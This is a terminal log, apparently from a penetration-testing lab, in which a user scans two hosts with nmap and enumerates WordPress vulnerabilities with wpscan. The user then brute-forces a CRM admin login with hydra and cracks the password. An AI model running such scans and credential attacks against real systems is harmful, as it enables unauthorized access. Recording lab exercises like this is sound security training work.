- root@kapirotohat:~# nmap -sS -A -n 192.168.101.10-11
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-09 21:52 -03
- Nmap scan report for 192.168.101.10
- Host is up (0.73s latency).
- Not shown: 996 filtered ports
- PORT STATE SERVICE VERSION
- 25/tcp open smtp Postfix smtpd
- |_smtp-commands: SMTP: EHLO 220 mail.ptest.lab ESMTP Postfix (Debian/GNU)\x0D
- 80/tcp open http nginx 1.12.1
- |_http-title: 403 Forbidden
- 88/tcp open hadoop-datanode Apache Hadoop 1.6.2
- | hadoop-datanode-info:
- |_ Logs: login-header
- |_hadoop-jobtracker-info:
- | hadoop-tasktracker-info:
- |_ Logs: login-header
- |_hbase-master-info:
- | http-robots.txt: 1 disallowed entry
- |_/
- |_http-server-header: nginx/1.6.2
- |_http-title: Users
- 8080/tcp open http nginx
- | http-robots.txt: 1 disallowed entry
- |_/
- |_http-server-header: nginx
- |_http-title: Site doesn't have a title (text/html).
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP|general purpose|printer|webcam
- Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
- OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
- Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 3 hops
- Service Info: Host: -mail.ptest.lab
- TRACEROUTE (using port 25/tcp)
- HOP RTT ADDRESS
- - Hops 1-2 are the same as for 192.168.101.11
- 3 758.72 ms 192.168.101.10
- Nmap scan report for 192.168.101.11
- Host is up (0.72s latency).
- Not shown: 999 filtered ports
- PORT STATE SERVICE VERSION
- 2222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
- | ssh-hostkey:
- |_ 1024 50:f9:23:6f:7e:3f:bb:68:77:5e:44:99:4d:51:9b:92 (DSA)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP|general purpose|printer|webcam
- Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
- OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
- Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 3 hops
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 2222/tcp)
- HOP RTT ADDRESS
- 1 758.28 ms 10.10.0.1
- 2 758.55 ms 172.0.1.1
- 3 760.72 ms 192.168.101.11
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 2 IP addresses (2 hosts up) scanned in 204.82 seconds
- root@kapirotohat:~# wpscan -a "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" -u 192.168.101.10
- _______________________________________________________________
- WordPress Security Scanner by the WPScan Team
- Version 2.9.2
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [+] URL: http://192.168.101.10/
- [+] Started: Mon Oct 9 21:58:39 2017
- [!] The WordPress 'http://192.168.101.10/readme.html' file exists exposing a version number
- [+] WordPress version 4.8 (Released on 2017-06-08) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
- [!] 7 vulnerabilities identified from the version number
- [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8905
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
- Reference: https://wpvulndb.com/vulnerabilities/8910
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41398
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
- Reference: https://wpvulndb.com/vulnerabilities/8911
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41457
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
- Reference: https://wpvulndb.com/vulnerabilities/8912
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41397
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
- Reference: https://wpvulndb.com/vulnerabilities/8913
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41448
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
- Reference: https://wpvulndb.com/vulnerabilities/8914
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41395
- Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
- Reference: https://wpvulndb.com/vulnerabilities/8807
- Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
- Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
- Reference: https://core.trac.wordpress.org/ticket/25239
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
- [+] WordPress theme in use: twentyseventeen - v1.3
- [+] Name: twentyseventeen - v1.3
- | Latest version: 1.3 (up to date)
- | Location: http://192.168.101.10/wp-content/themes/twentyseventeen/
- | Readme: http://192.168.101.10/wp-content/themes/twentyseventeen/README.txt
- | Style URL: http://192.168.101.10/wp-content/themes/twentyseventeen/style.css
- | Theme Name: Twenty Seventeen
- | Theme URI: https://wordpress.org/themes/twentyseventeen/
- | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
- | Author: the WordPress team
- | Author URI: https://wordpress.org/
- [+] Enumerating plugins from passive detection ...
- | 1 plugin found:
- [+] Name: kittycatfish-2.2 - v2.2
- | Location: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/
- | Readme: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/readme.txt
- [+] Finished: Mon Oct 9 22:01:21 2017
- [+] Requests Done: 63
- [+] Memory used: 63.863 MB
- [+] Elapsed time: 00:02:41
- root@kapirotohat:~# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/letrasminus.txt' -t 20 -o crm.txt
- Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 22:37:52
- [ERROR] Maximum number of passwords is 50000000, this file has 308915777 entries.
- root@kapirotohat:~# cd /root/Área\ de\ trabalho/backup\ kapiroto/WORDLIST/
- root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# ls
- azmaiu.txt letrasminus.txt nume.txt
- root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# split --lines 5000000 letrasminus.txt
- root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/xbl' -t 20 -o crm.txt
- Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 23:16:42
- [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
- [DATA] max 20 tasks per 1 server, overall 64 tasks, 4999999 login tries (l:1/p:4999999), ~3906 tries per task
- [DATA] attacking service http-post-form on port 88
- [STATUS] 149.00 tries/min, 149 tries in 00:01h, 4999850 to do in 559:17h, 20 active
- [STATUS] 147.33 tries/min, 442 tries in 00:03h, 4999557 to do in 565:34h, 20 active
- [STATUS] 147.29 tries/min, 1031 tries in 00:07h, 4998968 to do in 565:41h, 20 active
- [88][http-post-form] host: 192.168.101.10 login: admin password: blackstar
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-09 23:29:05